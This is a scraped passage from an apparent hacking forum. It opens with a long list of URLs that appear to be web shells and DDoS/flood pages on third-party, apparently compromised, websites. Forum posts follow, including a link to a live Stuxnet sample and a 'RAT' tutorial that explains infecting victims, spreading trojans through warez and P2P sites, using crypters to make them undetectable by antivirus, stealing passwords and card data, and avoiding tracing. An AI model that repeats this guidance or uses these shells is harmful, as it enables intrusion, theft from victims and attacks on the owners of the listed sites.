http://www.eft-tapping.net/shell.php
http://menzow.com/shell.php?act=phptools
http://www.flaggfabrikken.com/
http://millsrock.all.co.uk/shell.php
http://eros.vlo.gda.pl/~valacar/files/er...x=phptools
http://h1.Spam.com/machoxtaco/Progs/Somh.php
http://www.congresso8.zobyhost.com/r20x.php
http://colour-comic.com/indexfixer.php
http://africaevasion.com/needed.php
http://peer-egm.de/dwsync.php
http://godfi.com/indexfixer.php
http://www.chinahoner.cn/antu.php
http://computerdealer.co.nz/indexfixer.php
http://www.globalwedding.designhkweb.com/cgi.php
http://chinahoner.com/antu.php
http://www.globalwedding.designhkweb.com/images/cgi.php
http://crane-magnet.com/antu.php
http://www.limieten.info/images/admin.php
http://www.ibk.uk.st/shell1.php
http://www.grupomyb.com.mx/indexfixer.php
http://freehunter.biz/
http://grieveauth.webatu.com/
http://grayhat.tk/
http://menzow.com/shell.php?act=phptools
http://www.aboutsignsftp.co.uk/images/
http://frozngaming.com/forums/administrator/..php
http://www.dharumavantha.net/forums/admi...rums/..php
http://geofun.site.ge/?act=phptools
http://www.sureshotgps.com/_pdf/qqq.php
http://lermitage.co.za/includes/require.php
http://designetti.com/archive/require.php
http://www.sonicviewsupport.com/images/require.php
http://lamaisonnouvelle.fr/css/require.php
http://sxleton.awardspace.us/
http://testvbulletin.bplaced.net/dos/index.php
http://ackhydrofarm.com/downloads/
http://wh-u.com:8000/cpanel/ddos.html
http://wh-u.com:8000/d_dos.php
http://www.regab666.gigfa.com/
http://shelly.hostzi.com/?page=httpflood
http://ebeninki.net/
http://aura.host56.com/
http://k1x-hook.com/
http://www.orimikomi.be/dos/
http://freehunter.biz/
http://www.rocksecuritycams.741.com/ddos.php
http://d-dos.50webs.com/ddos.php
http://sxleton.awardspace.us
http://download.phpzilla.net/
http://uulu.freeiz.com/
http://www.webpublishingexperts.com/gene.../caroline/
http://h4ck3rs.eu.pn/ddos.php
http://peer-egm.de/dwsync.php
http://kombucha-shop.fr/php/dwsync.php
http://www.jnapple.net/index.php
http://serturplastik.com/xdp.php
http://trieksis.com/xdp.php
http://64.20.35.170/~ilulhard/idb.php
http://www.gzpc120.com/index.php
http://goldentouch5.com/contact/xdp.php
http://mcgossip.info/test.php
http://4on4.ca/dos.php
http://bcsasquatch.ca/dos.php
http://atlantics.ca/dos.php
http://174.121.134.58/~wewill/idb.php
Updating Thanks, Please Wait Say 'Thank You!' for this post. [/align]

Part of Stuxnet Binary

Xin — Tue, 22 Feb 2011 22:09:05 -0500

So i was browsing other forums and found a link to this,

Its part of the stuxnet binary, for you to try and dissect if you want, dont run it as its still active and will infect your computer.

http://forum.tuts4you.com/index.php?showtopic=23965

Some questions/answers related to Stuxnet worm

Legend_Xeon — Mon, 03 Jan 2011 08:08:02 -0500

Recently i saw an article on Stuxnet worm that created havoc in many industrial installations using Siemens Simatic PLC emulator.
I found it very very interesting and would like to share here.

There's the link:- http://www.f-secure.com/weblog/archives/00002040.html

Does malwares emits any kind of software user agents?

mandi — Mon, 08 Nov 2010 20:57:53 -0500

As the title says i Need to know whether malwares like RAT'S ,key-loggers,shells,trojan horses or what-ever kind of software connecting to
internet emits "user agents" from it's software to identify itself?

is this true?

I tought only browser's can emit user-agents from their respective softwares,but i am not sure about the other software Application being connected to the internet...

I am bit-confused ,So i decided to ask here...

Hope some one may clear my doubt...

About RAT

WhizKidz — Mon, 20 Sep 2010 05:20:48 -0400

Hello IExploit

In this tutorial you going to learn more about RAT(s) and how they work. Well RAT(s) are usually used for hacking, and they are detected as backdoors.

Popular RAT programs

[x]Cerberus Rat
[x]ProRat
[x]Poison Ivy
[x]Turkojan Gold Rat
[x]Sub Seven
[x]NetBus RAT
[x]Spy-Net
[x]LostDoor
[x]BitFrost
[x]Nuclear RAT
[x]Bandock
[x]Pain Rat
[x]Beast
[x]Optix Pro
[x]DARKMOON
[x]Net-Devil
[x]Apocalypse Rat
[x]CyberGate
[x]Bandook
[x]Shark

You can find really good RATs, here on HackForums for free. Also there's private version which are Fully Undetectable from AV's, but still you can find some really good RATs for free. You will only need file Crypter to make them FUD again.

Remote Administrator Tools Q&A.

Q - Whats RAT?
A - A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC's, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.

Q - How they work?
A - Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).

Q - Download?
A - Well you can find any type of RAT here, on HackForums. To download click spoiler(down) and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.

Q - How do I control server?
A - Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.

Q - What do I need to setup RAT?
A - Well, you will need Windows OS, open port & RAT. To forward your port scroll for tutorial link or click this URL.

Q - How do I port forward?
A - Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that's all you need to do and now you got open port

Q - How do I make my server FUD?
A - If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.

Q - How do I remove server if I infect myself?
A - When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes' Anti-Malware and scan whole computer for trojan.

Q - Legal or illegal?
A - Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).

Legal:
TeamViewer - Access any remote computer via Internet just like sitting in front of it - even through firewalls.
UltraVNC - Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
Ammyy Admin - Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
Mikogo - Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.

Illegal:
Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat
Q - Where and how do I spread?
A - There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.

Q - Whats DNS host?
A - The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.

Q - What can RAT do?
A - Here is list of basic features:
â€¢ Manage files
â€¢ Control web browser(Change homepage, open site etc.)
â€¢ Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)
â€¢ Get passwords, credit card numbers or private data etc.
â€¢ View and remote control desktop
â€¢ Record camera & sound
â€¢ Control mouse
â€¢ Delete, rename, download, upload or move files
Q - What's reverse Connection?
A - A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.

Q - Whats direct connection?
A - A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.

Q - Can I get traced when I rat somebody?
A - Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it's really hard to trace, because PC usually got over 300 connections. So don't worry.

Anyone agree with this?

McKittrick — Thu, 09 Dec 2010 21:28:39 -0500

i saw mention of viruses and coding them on here as of late. do any of you agree with me, that the days of real, true, damaging viruses are over? think about it. since the beginning of 2000, how many real hardcore viruses have you seen out there that are not just more forms of shitty propogation worms or annoying spy/malware?! i get upset everytime i hear "you better scan yourself for viruses or else" blah blah. i have yet to ever be infected with anything that can even be considered "serious". if you want to know a true virus that actually could take out a pc, go read up on the Chernobyl virus. how many virus' out there besides the new Stuxxnet actually attack at the hardware layer? how many out there write your MBR/hardrive to zeroes?

like i said, most of the crap out there now is boring, predictable malware garbage that can be easily detected with Process Explorer, then extrapolated. i doubt you will really see anything of substance from virus writers out there today. all they care about is spam/email propogation and infecting you with more ads saying "clean your registry or else". if you don't agree--that's fine

A short history of Christmas malware

Sh3llc0d3 — Wed, 15 Dec 2010 18:46:55 -0500

Not really much help to anyone but thought some of you may be interested in this article..

http://nakedsecurity.sophos.com/2010/12 ... t-history/